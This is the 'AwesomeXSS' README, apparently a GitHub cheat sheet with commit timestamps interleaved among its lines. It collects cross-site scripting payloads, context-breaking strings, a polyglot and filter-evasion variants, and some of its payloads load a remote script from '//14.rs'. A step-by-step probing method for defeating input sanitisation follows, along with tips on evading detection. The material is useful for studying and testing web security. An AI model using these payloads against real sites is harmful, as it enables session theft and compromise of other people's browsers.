2018-03-11 14:35:30 +00:00
# AwesomeXSS
2018-03-11 15:51:25 +00:00
Awesome XSS stuff.
Put this repo on watch. I will be updating it regularly.
2018-03-11 16:04:00 +00:00
2018-03-11 15:51:25 +00:00
### Awesome Books
- [XSS Cheat Sheet By Brute Logic ](http://google.com )
### Awesome Websites
- [brutelogic.com.br ](http://brutelogic.com.br )
- [respectxss.blogspot.in ](https://respectxss.blogspot.in/ )
2018-03-22 08:08:43 +00:00
### Awesome Challenges
- [Google's XSS Challenge ](https://xss-game.appspot.com/ )
- [prompt(1) to win ](http://prompt.ml/ )
2018-03-11 15:51:25 +00:00
### Awesome People
- [Rodolfo Assis ](https://twitter.com/brutelogic )
- [Ashar Javed ](https://twitter.com/soaj1664ashar )
2018-03-12 08:06:37 +00:00
- [Somdev Sangwan ](https://twitter.com/s0md3v ) because I made this repo :3
2018-03-11 15:51:25 +00:00
2018-03-22 08:08:43 +00:00
### Awesome Reads & Presentations
2018-03-11 15:51:25 +00:00
- [How I met your girlfriend ](https://www.youtube.com/watch?v=fWk_rMQiDGc )
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour ](https://www.youtube.com/watch?v=9ADubsByGos )
2018-03-22 08:08:43 +00:00
- [XSS in Sarahah ](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html )
- [XSS in Facebook via PNG Content Type ](https://whitton.io/articles/xss-on-facebook-via-png-content-types/ )
2018-03-11 15:51:25 +00:00
- [Blind XSS ](https://www.youtube.com/watch?v=OT0fJEtz7aE )
- [Copy Pest ](https://www.slideshare.net/x00mario/copypest )
2018-03-12 08:06:37 +00:00
### Awesome Tools
- [XSStrike ](http://xsstrike.tk/ )
- [KNOXSS ](http://knoxss.me/ )
2018-03-21 09:44:55 +00:00
- [BeEF ](https://github.com/beefproject/beef )
- [JShell ](https://github.com/UltimateHackers/JShell )
2018-03-12 08:06:37 +00:00
2018-03-22 13:04:27 +00:00
### Awesome Payloads
```
< -- ` < img / src = ` onerror = alert(1) > --!>
< svg % 0Aonload = %09((pro \u006dpt))()//
< sCript x > ( ( ( c o n f i r m ) ) ) ` ` < / s c R i p t x >
< svg / x = ">" / onload = confirm()//
< svg < / onload = "1> (_=prompt,_(1)) " " >
< embed src = //14.rs >
< script x = ">" src = //15.rs > < / script >
<!'/*"/*/'/*/"/*--> < / Script > < Image SrcSet = K * / ; OnError = confirm`1` / / >
< iframe / src \/\/onload = prompt(1)
< x oncut = alert() > x
< details ontoggle = confirm() >
< svg onload = write() >
< script y = "><" > / * < s c r i p t * * / p r o m p t ( ) < / s c r i p t
< w ="/ x = "y>" / ondblclick = `<`[confir \u006d``] > z
```
2018-03-22 13:15:06 +00:00
Here's an interesting XSS polyglot by [Ahmed Elsobky ](https://github.com/0xsobky/ ):
```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//< /stYle/< /titLe/< /teXtarEa/< /scRipt/--!>\x3csVg/< sVg / oNloAd = alert()// > \x3e
```
### Awesome Tags & Event Handlers
- [105 Event Handlers with description ](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md )
- [200 Event Handlers without description ](http://pastebin.com/raw/WwcBmz5J )
2018-03-22 13:04:27 +00:00
Some HTML Tags that you will be using
```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```
2018-03-11 15:51:25 +00:00
### Awesome Context Breaking
#### Simple Context
```
< svg onload = alert() >
< / tag > < svg onload = alert() >
```
#### Attribute Context
```
">< svg onload = alert() >
">< svg onload = alert() > < b attr = "
" onmouseover=alert() "
"onmouseover=alert()//
```
#### JavaScript Context
```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
< / script > < svg onload = alert() >
```
2018-03-21 06:48:10 +00:00
### Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
```
confirm()
confirm``
(((confirm)))``
new class extends confirm``{}
```
2018-03-11 16:04:00 +00:00
### Awesome Exploits
2018-03-21 06:48:10 +00:00
A good compilation of advanced XSS exploits can be found [here ](http://www.xss-payloads.com/payloads-list.html?a#category=all )
2018-03-11 15:51:25 +00:00
2018-03-12 08:06:37 +00:00
### Awesome Probing
If nothing of this works, take a look at **Awesome Bypassing** section
First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about number and contexts of refelections.
2018-03-21 08:14:41 +00:00
< br > Now for attribute context, check if double quotes (") are being filtered by entering **x"d3v** . If it gets altered to **x&quot;d3v** , chances are that proper security measures are in place. If this happens, try doing the same for single quotes (') by entering **x'd3v** , if it gets altered to **x&apos;** , you are doomed. The only thing you can try is encoding.< br >
2018-03-12 08:06:37 +00:00
If the quotes are not being filtered, you can simply try payloads from **Awesome Context Breaking** section.
< br > For javascript context, check which quotes are being used for example if they are doing
```
variable = 'value' or variable = "value"
```
2018-03-21 09:44:55 +00:00
Now lets say single quotes (') are in use, in that case enter **x'd3v** . If it gets altered to **x\\'d3v** , try escaping the backslash (\) by adding a backslash to your probe i.e. **x\\'d3v** . If it works use the following payload:
2018-03-12 08:06:37 +00:00
```
\'-alert()-\'
```
But if it gets altered to **x\\'d3v** , the only thing you can try is closing the script tag itself by using
```
< / script > < svg onload = alert() >
```
2018-03-21 08:14:41 +00:00
For simple HTML context, the probe is **x>d3v** . If it gets altered to **x&gt;d3v** , proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potenial filters. The dummy tag I like to use is **x<xxx>** . If it gets stripped or altered in any way, it means the filter is looking for a pair of ** < ** and ** >**. It can simply bypassed using
2018-03-12 08:06:37 +00:00
```
< svg onload = alert()//
```
or this (it will not work in all cases)
```
< svg onload = alert()
```
If the your dummy tags lands in the source code as it is, go for any of these payloads
```
< svg onload = alert() >
< embed src = //14.rs >
< details open ontoggle = alert() >
```
### Awesome Bypassing
2018-03-21 09:44:55 +00:00
**Note:** None of these payloads use single (') or double quotes (").
- Without event handlers
```
< object data = javascript:confirm() >
< script src = //14.rs >
< script > confirm ( ) < / script >
```
- Without space
```
< svg / onload = confirm() >
```
- Without slash (/)
```
< svg onload = confirm() >
< img src = x onerror = confirm() >
```
- Without equal sign (=)
```
< script > confirm ( ) < / script >
```
- Without closing angular bracket (>)
```
< svg onload = confirm()//
```
- Without alert, confirm, prompt
```
2018-03-22 08:08:43 +00:00
< script src = //14.rs > < / script >
2018-03-21 09:44:55 +00:00
< svg onload = co \u006efirm() >
< svg onload = z=co \u006efir \u006d,z() >
```
- Without a Valid HTML tag
```
< x onclick = confirm() > click here
```
2018-03-11 15:51:25 +00:00
### Awesome Tips & Tricks
2018-03-12 11:25:26 +00:00
- http(s):// can be shortened to // or /\.
2018-03-11 15:51:25 +00:00
- **document.cookie** can be shortened to **cookie** . It applies to other DOM objects as well.
2018-03-21 09:44:55 +00:00
- alert and other pop-up functions don't need a value, so stop doing **alert('XSS')** and start doing **alert()**
- You can use ** //** to close a tag instead of ** >**.
2018-03-11 16:05:42 +00:00
- I have found that **confirm** is the least detected pop-up function so stop using **alert** .
2018-03-21 09:44:55 +00:00
- Quotes around attribute value aren't neccessary as long as it doesn't contain spaces. You can use ** < script src=//14.rs> ** instead of ** < script src="//14.rs"&glt; **
- The shortest independent "XSS" payload is ** < embed src=//14.rs> ** (19 chars)
2018-03-11 16:04:00 +00:00
2018-03-12 11:25:26 +00:00
### Awesome Credits
2018-03-11 16:04:00 +00:00
All the payloads are crafted by me unless specified.
Thanks to my big brother [Rodolfo Assis ](https://twitter.com/brutelogic ) whose writings inspired me to become an XSSLord.